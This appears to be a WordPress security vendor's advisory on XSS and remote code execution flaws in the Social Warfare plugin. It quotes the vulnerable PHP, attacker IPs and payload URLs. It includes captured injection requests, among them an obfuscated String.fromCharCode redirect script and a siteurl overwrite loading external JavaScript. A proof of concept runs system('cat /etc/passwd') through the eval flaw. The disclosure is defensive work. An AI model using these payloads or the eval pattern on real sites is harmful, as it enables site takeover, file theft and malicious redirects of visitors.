Wordpress security

Social Warfare XSS and RCE Vulnerabilities and Attack Data

March 25, 2019 by Oliver Sild

Last week, an unnamed security researcher publicly disclosed security vulnerabilities in the popular WordPress plugin “Social Warfare“. Which according to WordPress Plugins repository currently has over 70,000 active installations. This has caught the attention of hackers and caused massive attacks on websites using that plugin. 

At the time of writing this article, we see the ongoing hacking campaign in which we blocked more than 80,000 hacking attempts.

Is someone trying to attack your website?

Find out now
Google Blacklist

Cross-site Scripting in Social Warfare Plugin

The flaw that has been used for already widespread ad injection is abusing the function which retrieves the code from the “swp_url” parameter and saves it as Social Warfare plugin settings. That behavior allows the attacker to inject code that will be run in the web browser of the visitors when social warfare buttons are loaded.

//* Preserve filtered data, such as license keys.
$new_options = array_merge( get_option('social_warfare_settings'), $fetched_options );

if (update_option( 'social_warfare_settings', $new_options )) {
     wp_die('Social Warfare settings updated to match ' . $_GET['swp_url']);
}

Attack Sources

There are active hacking campaigns against websites that use “Social Warfare” plugin at the moment. Top 5 attack sources detected by WebARX (from over 80,000 blocked attempts) origins from following IP addresses:

  • 46.32.249.72
  • 34.194.221.173
  • 74.208.85.144
  • 93.90.206.23
  • 162.243.1.231

Attack Payloads

At the beginning of the hacking campaign, attackers mainly used only PasteBin to anonymously host their malicious code. Few days after, we noticed an IP that belongs to hosting provider “McHost.Ru“.

  • https://pastebin.com/raw/HRsL6Drh (49.05%)
  • http://109.234.34.22/mv.txt (47.03%)
  • https://pastebin.com/raw/Th1EKR8i (0.1%)
  • others (3.82%)

Malicious code in attack payloads comes in Unicode numbers which are later converted to a string and executed as a JavaScript code. In most cases, it simply redirects users to an ads site.

Social Warfare
Payload.

“is_admin()” function

It is evident that the developers had the intention to verify whether the user can use the functionality to save the settings, but unfortunately using the wrong function.

if (!is_admin()) {
    wp_die('You do not have authorization to view this page.');
}

Very often developers believe that is_admin function checks if the current user has administrator privileges. However, it only checks if the requested page is part of the admin interface. In this case, wp-admin/admin-post.php file is and it allowed everyone to import plugin settings.

Other plugins also targeted

The same IP is targeting other plugins that are known to have security issues in permission handling. We noticed attacks against WP GDPR plugin, Smart Google Code Inserter and couple others.

Screenshot from WebARX firewall logs.
// Attacks on WP GDPR plugin
Array
(
    [action] => wpgdprc_process_action
    [data] => {"type":"save_setting","append":false,"option":"siteurl","value" :"https://redrentalservice.com/java.js?t=2&"}
    [security] => 
)

// Attacks on Smart Google Code Inserter plugin
Array
(
    [action] => savegooglecode
    [sgcgoogleanalytic] => <script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 97, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 114, 101, 100, 114, 101, 110, 116, 97, 108, 115, 101, 114, 118, 105, 99, 101, 46, 99, 111, 109, 47, 63, 116, 52, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 97, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 97, 59, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 97, 59));</script>
    [sgcwebtools] => 
)

Remote Code Execution in Social Warfare Plugin

While most focused on XSS attacks and injected ads, we also detected another critical vulnerability. This vulnerability allows an attacker to take over the entire WordPress site and manage all files and databases on your hosting account.

The vulnerability is located in the eval() function that runs the PHP code defined by the attacker in the “swp_url” GET parameter.

$options = file_get_contents($_GET['swp_url'] . '?swp_debug=get_user_options');

// ...

$array = 'return ' . $options . ';';

try {

     $fetched_options = eval( $array );

}

Proof of Concept

Instead of passing an array of plugin settings, the attacker can pass it in the “swp_url” parameter which will execute system command and return output.

<!-- Content of http://192.168.8.103:31337/test.txt -->
<pre>system('cat /etc/passwd')</pre>
Social Warfare

Conclusion

We strongly encourage you to update Social Warfare plugin to the latest version (3.5.3). It patches both vulnerabilities mentioned in this article.

Firewall rules for both of those vulnerabilities have been shipped to WebARX users since 22nd of March.

Is your website infected with malware?

Clean your site now
wordpress malware removal

Wordpress security

Start your free 7-day trial now

Protect your websites from malicious traffic - set-up in under 3 minutes.

Try it now

WebARX is compatible with the following platforms:

PHP
WordPress
Magento
Drupal
Joomla